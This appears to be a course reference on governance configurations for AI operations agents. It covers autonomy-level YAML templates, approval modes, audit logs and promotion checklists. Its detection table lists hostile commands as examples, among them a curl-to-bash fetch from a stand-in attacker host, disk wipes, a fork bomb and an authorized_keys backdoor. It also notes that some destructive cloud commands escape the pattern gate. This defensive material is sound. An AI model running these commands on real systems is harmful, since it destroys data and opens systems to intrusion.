
Reference: Governance Config Templates and Audit Logs

Quick-reference for Module 13 — configuring governance layers in Hermes.


1. Governance Config per Maturity Level

L1: Assistive

# governance-L1.yaml — No terminal, no commands, no approval gate fires
model:
  default: "anthropic/claude-haiku-4"
  provider: "auto"

platform_toolsets:
  cli: [web, skills]  # terminal absent: agent cannot execute commands

approvals:
  mode: manual  # mode is set even at L1; defense against misconfiguration
  timeout: 300

command_allowlist: []

agent:
  max_turns: 30

The agent reads web resources and loaded skills and proposes actions as text. The human reviews every proposed step and executes it manually. This is the correct starting point for any new agent in a new environment.
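
As a rough illustration of the L1 shape described above, the sketch below checks a config for the three properties that make it Assistive: no terminal toolset, manual approvals, and an empty allowlist. The helper name `l1_violations` is hypothetical and not part of Hermes, and the config is written as a plain dict mirroring governance-L1.yaml so that no YAML parser is assumed.

```python
# Hypothetical helper, not part of Hermes. The dict mirrors governance-L1.yaml.
L1_CONFIG = {
    "platform_toolsets": {"cli": ["web", "skills"]},
    "approvals": {"mode": "manual", "timeout": 300},
    "command_allowlist": [],
    "agent": {"max_turns": 30},
}


def l1_violations(config: dict) -> list[str]:
    """Return the reasons a config does not match the L1 (Assistive) shape."""
    problems = []
    toolsets = config.get("platform_toolsets", {}).get("cli", [])
    if "terminal" in toolsets:
        problems.append("terminal toolset present: agent could execute commands")
    if config.get("approvals", {}).get("mode") != "manual":
        problems.append("approvals.mode is not manual")
    if config.get("command_allowlist"):
        problems.append("command_allowlist is not empty")
    return problems


print(l1_violations(L1_CONFIG))  # prints: []
```

A check like this could run before an agent is deployed, so that a config copied from a higher level is caught before it grants terminal access.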

L2: Advisory

# governance-L2.yaml — Terminal enabled, manual approval for all DANGEROUS_PATTERNS matches
model:
  default: "anthropic/claude-haiku-4"
  provider: "auto"

platform_toolsets:
  cli: [terminal, file, web, skills]  # terminal enabled

approvals:
  mode: manual  # every DANGEROUS_PATTERNS match pauses for human decision
  timeout: 300

command_allowlist: []  # nothing pre-approved

agent:
  max_turns: 30

Diff from L1: platform_toolsets.cli gains terminal and file. The approval mode is the same (manual), but it now has commands to potentially flag.

diff course/governance/governance-L1.yaml course/governance/governance-L2.yaml
# < cli: [web, skills]
# > cli: [terminal, file, web, skills]

L3: Proposal

# governance-L3.yaml — Smart approval replaces manual
model:
  default: "anthropic/claude-haiku-4"
  provider: "auto"

platform_toolsets:
  cli: [terminal, file, web, skills]

approvals:
  mode: smart  # auxiliary LLM auto-approves low-risk, escalates high-risk
  timeout: 300

command_allowlist: []

agent:
  max_turns: 30

Diff from L2: Only approvals.mode changes. The toolsets and allowlist are identical.

diff course/governance/governance-L2.yaml course/governance/governance-L3.yaml
# < mode: manual
# > mode: smart

L4: Semi-Autonomous (Track A — DBA)

# governance-L4-track-a.yaml — Smart approval + documented allowlist discussion
model:
  default: "anthropic/claude-haiku-4"
  provider: "auto"

platform_toolsets:
  cli: [terminal, file, web, skills]

approvals:
  mode: smart
  timeout: 300

# command_allowlist at L4 Track A:
# At the course level, this remains empty. In production, it would contain
# description-key strings from DANGEROUS_PATTERNS for commands that Track A
# legitimately needs to run and has demonstrated as safe over its L2-L3 track record.
# Example (not added until formal review):
#   - "SQL SELECT"  # Read-only queries: never flagged but not yet pre-approved at course level
command_allowlist: []

agent:
  max_turns: 30

L4: Semi-Autonomous (Track B — FinOps)

# governance-L4-track-b.yaml
# IMPORTANT NOTE: aws ec2 terminate-instances and modify-instance-attribute
# are NOT in Hermes DANGEROUS_PATTERNS. Safety for these commands is enforced
# via SOUL.md NEVER rules (behavioral governance), not the approval gate (mechanical).
# This means the command_allowlist cannot help for Track B's most dangerous commands.
# SOUL.md NEVER rules are load-bearing for Track B — removing them would leave
# NO mechanical backstop for terminate-instances.

platform_toolsets:
  cli: [terminal, file, web, skills]

approvals:
  mode: smart
  timeout: 300

command_allowlist: []

L4: Semi-Autonomous (Track C — Kubernetes)

# governance-L4-track-c.yaml
# IMPORTANT NOTE: kubectl delete, kubectl drain, and kubectl cordon
# are NOT in Hermes DANGEROUS_PATTERNS. Same pattern as Track B.
# SOUL.md NEVER rules are the primary governance mechanism for K8s destructive commands.
# Removing NEVER rules from Kiran's SOUL.md would leave no protection against kubectl drain.

platform_toolsets:
  cli: [terminal, file, web, skills]

approvals:
  mode: smart
  timeout: 300

command_allowlist: []

2. Diff Commands to See What Changes Between Levels

# See what L2 adds to L1 (adding terminal access)
diff course/governance/governance-L1.yaml course/governance/governance-L2.yaml

# See what L3 changes from L2 (approval mode only)
diff course/governance/governance-L2.yaml course/governance/governance-L3.yaml

# See what L4 Track A documents vs L3 (mostly comments, empty allowlist)
diff course/governance/governance-L3.yaml course/governance/governance-L4-track-a.yaml

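The progression is incremental: each level changes at most one key relative to the previous level. L1→L2 extends platform_toolsets.cli, L2→L3 switches approvals.mode, and L3→L4 Track A differs mostly in comments.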
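
The same comparison can be sketched in Python when a key-level view is more useful than a line diff. This is a minimal illustration, assuming the configs have already been loaded into dicts; `flatten` and `changed_keys` are hypothetical helper names, and the dicts below copy only the keys relevant to the comparison.

```python
def flatten(config: dict, prefix: str = "") -> dict:
    """Flatten nested dicts into dotted keys such as approvals.mode."""
    flat = {}
    for key, value in config.items():
        path = f"{prefix}{key}"
        if isinstance(value, dict):
            flat.update(flatten(value, path + "."))
        else:
            flat[path] = value
    return flat


def changed_keys(old: dict, new: dict) -> dict:
    """Map each dotted key whose value differs to an (old, new) pair."""
    a, b = flatten(old), flatten(new)
    return {k: (a.get(k), b.get(k)) for k in sorted(a.keys() | b.keys()) if a.get(k) != b.get(k)}


L1 = {
    "platform_toolsets": {"cli": ["web", "skills"]},
    "approvals": {"mode": "manual", "timeout": 300},
    "command_allowlist": [],
}
L2 = {
    "platform_toolsets": {"cli": ["terminal", "file", "web", "skills"]},
    "approvals": {"mode": "manual", "timeout": 300},
    "command_allowlist": [],
}
L3 = {**L2, "approvals": {"mode": "smart", "timeout": 300}}

print(list(changed_keys(L1, L2)))  # prints: ['platform_toolsets.cli']
print(changed_keys(L2, L3))        # prints: {'approvals.mode': ('manual', 'smart')}
```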


3. Approval Mode Detail

manual (L2 default)

When DANGEROUS_PATTERNS matches a command with approvals.mode: manual:

⚠️  DANGEROUS COMMAND: SQL DROP
DROP TABLE users
[o]nce | [s]ession | [a]lways | [d]eny

Choice semantics:

  • once: approve this specific execution. The next time the same pattern is detected, ask again.
  • session: approve this pattern for the rest of this conversation session.
  • always: approve this pattern permanently (written to command_allowlist in config.yaml).
  • deny: block execution. The agent is told "BLOCKED: User denied. Do NOT retry."

Timeout: If no response within approvals.timeout seconds (default 300), the command is treated as denied.

In gateway mode (Slack, Telegram, Discord), the approval prompt is delivered as a message and the agent thread blocks until the human responds with /approve or /deny.
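
The choice semantics and the timeout rule above can be summarized in a small sketch. It is not the Hermes implementation: `Decision` and `resolve_choice` are hypothetical names, a timeout is modeled as `None`, and treating unrecognized input as a denial is an assumption made here so the sketch fails closed.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Decision:
    approved: bool
    scope: Optional[str]  # "once", "session", "always", or None when denied


# Single-letter keys taken from the prompt: [o]nce | [s]ession | [a]lways | [d]eny
CHOICES = {"o": "once", "s": "session", "a": "always", "d": "deny"}


def resolve_choice(key: Optional[str]) -> Decision:
    """Turn the operator's keypress into a decision; None models a timeout."""
    choice = CHOICES.get((key or "").strip().lower())
    if choice is None or choice == "deny":
        # Timeout is treated as denied (per the text above); unrecognized
        # input is also denied here, which is an assumption of this sketch.
        return Decision(approved=False, scope=None)
    return Decision(approved=True, scope=choice)


print(resolve_choice("s"))   # prints: Decision(approved=True, scope='session')
print(resolve_choice(None))  # prints: Decision(approved=False, scope=None)
```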

smart (L3 default)

The same pattern detection runs, but before presenting to the human, an auxiliary LLM reviews the command:

# From tools/approval.py
prompt = """You are a security reviewer for an AI coding agent.
Command: {command}
Flagged reason: {description}

APPROVE if the command is clearly safe
DENY if genuinely dangerous
ESCALATE if uncertain

Respond with exactly one word: APPROVE, DENY, or ESCALATE"""

The three verdicts are handled as follows:

  • APPROVE: command is a false positive (e.g., python -c "print('hello')" triggering the -c flag pattern). Auto-approved, session-level.
  • DENY: command is genuinely dangerous. Blocked without user prompt.
  • ESCALATE: uncertain. Falls through to manual prompt.

When the auxiliary LLM is unavailable (no credentials, API error), smart mode falls back to manual.
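
The routing of the three verdicts, including the fallback to manual, might look roughly like the sketch below. `smart_review` and its `ask_llm` parameter are hypothetical stand-ins for the auxiliary model call, not the code in tools/approval.py, and sending any unexpected reply to the human is an assumption of this sketch.

```python
from typing import Callable


def smart_review(command: str, description: str, ask_llm: Callable[[str, str], str]) -> str:
    """Return "approved", "blocked", or "manual" for a flagged command."""
    try:
        verdict = ask_llm(command, description).strip().upper()
    except Exception:
        return "manual"  # reviewer unavailable: fall back to the manual prompt
    if verdict == "APPROVE":
        return "approved"
    if verdict == "DENY":
        return "blocked"
    return "manual"  # ESCALATE, or anything unexpected, goes to the human


def unavailable(command: str, description: str) -> str:
    """Simulates missing credentials or an API error."""
    raise ConnectionError("auxiliary model unreachable")


print(smart_review('python -c "print(1)"', "script execution via -e/-c flag", lambda c, d: "APPROVE"))  # prints: approved
print(smart_review("DROP TABLE users", "SQL DROP", unavailable))  # prints: manual
```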

With the approval gate disabled, all DANGEROUS_PATTERNS checks are bypassed and every command executes regardless of pattern matches. This is appropriate only for:

  • Containerized environments where the sandbox provides isolation
  • HERMES_YOLO_MODE development flag
  • Explicitly justified L4 contexts with documented rationale

Bypassing the checks is never appropriate for a first deployment, for production systems without audit review, or for situations where the operator cannot explain why approval is unnecessary for each DANGEROUS_PATTERNS category.


4. DANGEROUS_PATTERNS Category Reference

DANGEROUS_PATTERNS in tools/approval.py is a list of (regex, description) tuples. The description key is the human-readable label used in approval prompts, audit logs, and command_allowlist entries.
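
To make the (regex, description) structure concrete, here is a minimal sketch of how such a list could be matched against a command and checked against command_allowlist. The three regexes are illustrative only and are not the expressions used in tools/approval.py; `first_match` and `needs_approval` are hypothetical names.

```python
import re
from typing import Optional

# Illustrative regexes only: the real expressions live in tools/approval.py
# and are not reproduced here.
EXAMPLE_PATTERNS = [
    (r"\bDROP\s+(TABLE|DATABASE)\b", "SQL DROP"),
    (r"\bTRUNCATE\s+TABLE\b", "SQL TRUNCATE"),
    (r"\brm\s+-[a-zA-Z]*r[a-zA-Z]*\b", "recursive delete"),
]


def first_match(command: str) -> Optional[str]:
    """Return the description key of the first pattern that matches, if any."""
    for regex, description in EXAMPLE_PATTERNS:
        if re.search(regex, command, flags=re.IGNORECASE):
            return description
    return None


def needs_approval(command: str, allowlist: list[str]) -> bool:
    """A flagged command skips the gate only if its description key is allowlisted."""
    description = first_match(command)
    return description is not None and description not in allowlist


print(first_match("DROP TABLE users"))                  # prints: SQL DROP
print(needs_approval("DROP TABLE users", ["SQL DROP"]))  # prints: False
print(first_match("aws ec2 terminate-instances --instance-ids i-123"))  # prints: None
```

The last call shows why a command absent from the pattern list never reaches the approval gate: nothing matches, so there is nothing to approve or allowlist.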

Full Category List

| Category | Example Command | Why It's Dangerous |
|---|---|---|
| recursive delete | rm -rf /path, find . -delete | Irreversible bulk file deletion; scope errors destroy data |
| SQL DROP | DROP TABLE users, DROP DATABASE prod | Destroys database object; recovery requires backup restore |
| SQL DELETE without WHERE | DELETE FROM users (no WHERE) | Truncates entire table; looks like targeted delete |
| SQL TRUNCATE | TRUNCATE TABLE orders | Same effect as DELETE without WHERE, no row-level rollback |
| shell command via -c flag | bash -c "rm -rf ..." | Executes dynamically constructed commands, bypasses other detection |
| script execution via -e/-c flag | python -c "...", perl -e "..." | Same risk with different interpreters |
| pipe remote content to shell | curl evil.com \| bash | Arbitrary remote code execution via network fetch |
| execute remote script via process substitution | bash <(curl ...) | Same as above with different syntax |
| format filesystem | mkfs.ext4 /dev/sda | Wipes an entire disk partition |
| disk copy | dd if=/dev/zero of=/dev/sda | Overwrites entire disk with zeros |
| world/other-writable permissions | chmod 777 /etc/cron.d/ | Creates security vulnerability on shared systems |
| recursive chown to root | chown -R root /home/user | Locks user out of their own files |
| stop/disable system service | systemctl stop nginx | Stops production services; may cause immediate outage |
| kill all processes | kill -9 -1 | Kills all processes the user can reach |
| fork bomb | :(){ :\|:& };: | Exhausts process table; system becomes unresponsive |
| overwrite system config | echo "..." > /etc/hosts | Modifies system configuration files |
| write to block device | echo data > /dev/sda | Corrupts disk sectors |
| overwrite system file via tee/redirection | tee ~/.ssh/authorized_keys | Backdoors the system |
| delete in root path | rm /etc/nginx.conf | Wipes system configuration files |
| start gateway outside systemd | (internal pattern) | Prevents agent from starting second gateway instance |
| kill hermes/gateway process | pkill hermes | Prevents agent from terminating its own runtime |

Track-Specific Pattern Notes

Track A (DBA) most commonly encounters:

  • SQL DROP — can fire during diagnostic work if Aria suggests a test DROP (should not, but might)
  • SQL DELETE without WHERE — fires during any full-table operation
  • SQL TRUNCATE — fires during any table-clearing operation

The approval gate is the mechanical backstop for Aria's SOUL.md NEVER DDL rule.

Track B (FinOps) and Track C (Kubernetes) rarely encounter DANGEROUS_PATTERNS in normal operation. Their destructive commands (aws ec2 terminate-instances, kubectl delete) are intentionally NOT in the list, so SOUL.md NEVER rules are the sole governance mechanism for those commands.

Fleet coordinator has no terminal toolset, so DANGEROUS_PATTERNS never fires for Morgan. Morgan's governance is purely behavioral.


5. Structured Approval Proposal Format

When an agent generates a proposal (L3+ with approvals.mode: smart or in a gateway integration), the structured format includes:

## Action Proposal — Hermes DB Health Agent

**Action Type:** Modify RDS Parameter Group
**Proposed Action:** Increase max_connections from 100 to 150 on db-prod-01

**Evidence Supporting This Change:**
- Connection pool utilization: 98/100 connections (98%) at 14:22 UTC
- Active wait_event_type=Lock: 12 queries waiting on connection
- CPU: 28% (normal — not a compute constraint)
- p99 latency: 450ms (vs. 120ms baseline — 275% elevated)

**Root Cause Assessment (High confidence):**
Connection pool exhaustion is causing query queuing. Increasing max_connections by 50 provides
immediate relief while root cause (elevated active connections) is investigated.

**Expected Outcome:**
- Connection wait queue should clear within 60 seconds of parameter application
- p99 latency should return to near-baseline within 5 minutes

**Rollback Plan:**
Reduce max_connections back to 100 via:
`aws rds modify-db-parameter-group --db-parameter-group-name prod-pg15 \
--parameters ParameterName=max_connections,ParameterValue=100,ApplyMethod=immediate`

**Risk Assessment:** Low — increasing connection limit is reversible; does not risk data loss.

**Time Sensitivity:** High — current connection exhaustion is causing customer-facing latency.

**To approve:** Reply APPROVE | To reject: Reply REJECT [reason]
Expires in 10 minutes. If no response, action will be ABORTED.
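
The reply and expiry rules in the proposal footer could be handled along the lines of the sketch below. `resolve_reply` is a hypothetical function, not a Hermes API, and aborting on an unrecognized reply is an assumption of this sketch rather than documented behavior.

```python
from datetime import datetime, timedelta, timezone
from typing import Optional

EXPIRY = timedelta(minutes=10)  # "Expires in 10 minutes" from the proposal footer


def resolve_reply(sent_at: datetime, reply: Optional[str], replied_at: Optional[datetime]) -> tuple[str, str]:
    """Return (status, reason) where status is APPROVED, REJECTED, or ABORTED."""
    if reply is None or replied_at is None or replied_at - sent_at > EXPIRY:
        return ("ABORTED", "no response before expiry")
    word, _, rest = reply.strip().partition(" ")
    if word.upper() == "APPROVE":
        return ("APPROVED", "")
    if word.upper() == "REJECT":
        return ("REJECTED", rest.strip())
    # Assumption: anything else is not treated as consent.
    return ("ABORTED", f"unrecognized reply: {reply!r}")


sent = datetime(2026, 4, 1, 14, 23, tzinfo=timezone.utc)
print(resolve_reply(sent, "REJECT needs DBA review", sent + timedelta(minutes=1)))
# prints: ('REJECTED', 'needs DBA review')
print(resolve_reply(sent, "APPROVE", sent + timedelta(minutes=11)))
# prints: ('ABORTED', 'no response before expiry')
```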

6. Audit Log Format

Every approval event creates a log entry. In CLI mode, approval interactions are written to the standard Hermes session log. In gateway mode, they are recorded in the session's SQLite state database.

For cron-scheduled jobs, the scheduler saves all agent output to ~/.hermes/cron/output/{job_id}/{timestamp}.md. When an agent has nothing new to report, it begins its response with [SILENT] — this suppresses delivery to the messaging platform, but the output is still saved locally for audit. The audit trail is never suppressed, even when delivery is.
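
The separation between saving and delivering can be sketched as follows. This is an illustration of the rule, not the scheduler's code: `record_cron_output` is a hypothetical name, the base directory stands in for ~/.hermes, and the timestamp format in the file name is an assumption.

```python
import tempfile
from pathlib import Path

SILENT_MARKER = "[SILENT]"


def record_cron_output(base: Path, job_id: str, timestamp: str, output: str) -> tuple[Path, bool]:
    """Save output for audit and report whether it should be delivered."""
    path = base / "cron" / "output" / job_id / f"{timestamp}.md"
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(output, encoding="utf-8")  # always saved, even when silent
    deliver = not output.startswith(SILENT_MARKER)
    return path, deliver


with tempfile.TemporaryDirectory() as tmp:
    saved, deliver = record_cron_output(
        Path(tmp), "job-42", "2026-04-01T14-23-11Z", "[SILENT] nothing new"
    )
    print(saved.exists(), deliver)  # prints: True False
```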

Audit Entry Schema

{
  "audit_id": "AUD-2026-04-01-0001",
  "timestamp": "2026-04-01T14:23:11Z",
  "agent": {
    "profile": "track-a",
    "governance_level": "L2",
    "skill": "dba-rds-slow-query-1.0.0"
  },
  "trigger": {
    "type": "cli",
    "task": "Investigate high CPU on prod-db-01"
  },
  "actions": [
    {
      "sequence": 1,
      "action_type": "read_metrics",
      "tool": "terminal",
      "command": "aws cloudwatch get-metric-statistics [params]",
      "dangerous_pattern_matched": null,
      "governance_category": "DO",
      "status": "success"
    },
    {
      "sequence": 5,
      "action_type": "query_pg_stat_statements",
      "tool": "terminal",
      "command": "psql -h $DB_HOST ... -c 'SELECT ... FROM pg_stat_statements'",
      "dangerous_pattern_matched": null,
      "governance_category": "DO",
      "status": "success"
    }
  ],
  "outcome": {
    "diagnosis": "SLOW_QUERY_INDEX_GAP",
    "confidence": "high",
    "escalation": "none",
    "recommendation": "CREATE INDEX CONCURRENTLY on orders(user_id, created_at)"
  }
}

Audit log retention:

  • L1/L2: 90 days
  • L3: 365 days
  • L4: 7 years (2,555 days) for enterprise compliance
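
As a small worked example of the retention rules, the sketch below computes the earliest purge time for an audit entry from its governance_level and timestamp fields. `purge_after` is a hypothetical helper; only the retention periods and the field names come from the schema above.

```python
from datetime import datetime, timedelta

# Retention periods in days, copied from the list above.
RETENTION_DAYS = {"L1": 90, "L2": 90, "L3": 365, "L4": 2555}


def purge_after(entry: dict) -> datetime:
    """Earliest time an audit entry may be purged, per its governance level."""
    level = entry["agent"]["governance_level"]
    # Older Python versions reject a trailing "Z" in fromisoformat, so swap it.
    created = datetime.fromisoformat(entry["timestamp"].replace("Z", "+00:00"))
    return created + timedelta(days=RETENTION_DAYS[level])


entry = {"timestamp": "2026-04-01T14:23:11Z", "agent": {"governance_level": "L2"}}
print(purge_after(entry).isoformat())  # prints: 2026-06-30T14:23:11+00:00
```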

7. Promotion Criteria Framework

| Evidence Type | Metric | Suggested Threshold | Notes |
|---|---|---|---|
| Session count | Total diagnostic sessions completed | ≥ 50 (L1→L2); ≥ 100 (L2→L3) | More sessions = more evidence |
| DANGEROUS_PATTERNS violations | Attempted dangerous commands without legitimate need | 0 | Any violation resets the clock |
| False positive rate | Approval events triggered by safe commands | < 5% of sessions | High false-positive rate suggests SOUL.md needs tightening |
| Escalation correctness | Escalations that were genuinely needed | ≥ 90% correct | Low rate suggests agent over-escalates |
| Unexpected behavior events | Surprises outside expected operating pattern | 0 | Any surprise requires review before promotion |
| Evidence period | Duration of observation | ≥ 2 weeks (L2→L3); ≥ 4 weeks (L3→L4) | Longer periods reduce sample bias |
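
One way to apply these thresholds is to encode them as explicit checks, so a promotion review starts from a list of unmet criteria. The sketch below does this for L2→L3 using the suggested values from the table; the `Evidence` dataclass and `l2_to_l3_blockers` are hypothetical names, and the thresholds are suggestions to adapt, not fixed policy.

```python
from dataclasses import dataclass


@dataclass
class Evidence:
    sessions: int
    pattern_violations: int
    false_positive_rate: float     # fraction of sessions, 0.0 to 1.0
    escalation_correctness: float  # fraction of escalations that were needed
    unexpected_events: int
    evidence_days: int


def l2_to_l3_blockers(e: Evidence) -> list[str]:
    """Return unmet L2->L3 criteria, using the suggested table thresholds."""
    checks = [
        (e.sessions >= 100, "session count below 100"),
        (e.pattern_violations == 0, "DANGEROUS_PATTERNS violations present"),
        (e.false_positive_rate < 0.05, "false positive rate at or above 5%"),
        (e.escalation_correctness >= 0.90, "escalation correctness below 90%"),
        (e.unexpected_events == 0, "unexpected behavior events present"),
        (e.evidence_days >= 14, "evidence period shorter than 2 weeks"),
    ]
    return [reason for ok, reason in checks if not ok]


ready = Evidence(120, 0, 0.02, 0.95, 0, 21)
print(l2_to_l3_blockers(ready))  # prints: []
```

An empty list means the numeric criteria are met; the formal review in the promotion checklist still applies.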

8. Promotion Checklists

L1 → L2 Promotion

[ ] Agent has operated at L1 for a minimum of 30 days (minimum evidence period: 2 weeks)
[ ] Session count ≥ 50
[ ] Diagnosis accuracy rate ≥90% (verified against human outcome records)
[ ] Zero false P1 escalations in the observation window
[ ] All audit logs reviewed — no unexpected actions or access patterns
[ ] SOUL.md NEVER rules reviewed for completeness for the domain
[ ] Proposed L2 toolset (terminal + file) reviewed and approved by team lead

L2 → L3 Promotion

[ ] Agent has operated at L2 for minimum 4 weeks
[ ] Session count ≥ 100
[ ] 0 DANGEROUS_PATTERNS violations attempted (all DBA operations were SELECT, EXPLAIN, SHOW)
[ ] False-positive approval rate < 5% of sessions
[ ] Escalation policy triggers correctly identified and escalated in ≥ 90% of cases
[ ] Zero approval requests that the human operator found unexpected
[ ] For Track B/C: SOUL.md NEVER rules confirmed load-bearing and validated correct
[ ] Formal review and config change: approvals.mode manual → smart

L3 → L4 Promotion

[ ] Agent has operated at L3 for minimum 4 weeks
[ ] Autonomous L3 actions successful ≥ 95% (from audit log)
[ ] Zero incidents caused by agent autonomous actions
[ ] L4 autonomous action scope formally documented
[ ] Each proposed command_allowlist entry: pattern justified, blast radius assessed
[ ] No silent pre-approvals — every allowlist entry has documented rationale
[ ] Formal governance board review with written sign-off
[ ] Security team signed off on credential scope for L4
[ ] Incident response plan for "agent causes an incident at L4" documented

9. Demotion Triggers

| Trigger | Automatic Action |
|---|---|
| Incident caused by autonomous agent action | Immediate demotion one level |
| Accuracy rate < 80% over 30-day rolling window | Demotion to L2 + review |
| False P1 escalation | Demotion review (may remain at current level with documented fix) |
| Unapproved action detected in audit log | Immediate L1 until investigation complete |
| Security finding in agent credential scope | Immediate L1 until remediated |
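
The trigger table can also be read as a mapping from (current level, trigger) to a new level. The sketch below encodes it that way under a few assumptions: the trigger identifiers are hypothetical labels for the table rows, an agent already below L2 is not raised by the accuracy rule, and a false P1 escalation leaves the level unchanged pending the review.

```python
LEVELS = ["L1", "L2", "L3", "L4"]


def demote(current: str, trigger: str) -> str:
    """Return the level an agent should run at after a demotion trigger fires."""
    idx = LEVELS.index(current)
    if trigger in ("unapproved_action", "credential_scope_finding"):
        return "L1"  # immediate L1 until investigated or remediated
    if trigger == "incident":
        return LEVELS[max(idx - 1, 0)]  # one level down, never below L1
    if trigger == "accuracy_below_80":
        return LEVELS[min(idx, 1)]  # down to L2; never raises an L1 agent
    if trigger == "false_p1_escalation":
        return current  # review only; level may stay with a documented fix
    raise ValueError(f"unknown trigger: {trigger}")


print(demote("L4", "incident"))           # prints: L3
print(demote("L3", "unapproved_action"))  # prints: L1
```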

10. Is Your Governance Config Production-Ready? Checklist

  • SOUL.md NEVER rules cover the most dangerous actions for this domain (not just generic AI safety rules)
  • approvals.mode is set to manual for first deployment; smart only after documented L2 track record
  • command_allowlist entries are documented with rationale — no silent pre-approvals
  • approvals.timeout is appropriate to deployment context (300s for interactive; lower for automated pipelines)
  • Audit log location is known and accessible to operators responsible for the promotion decision
  • For Track B agents: SOUL.md NEVER rules for aws ec2 terminate-instances are treated as load-bearing safety controls
  • For Track C agents: SOUL.md NEVER rules for kubectl delete and kubectl drain are treated as load-bearing safety controls
  • Promotion criteria are documented and understood by all operators
  • Demotion triggers are documented and enforced (not just advisory)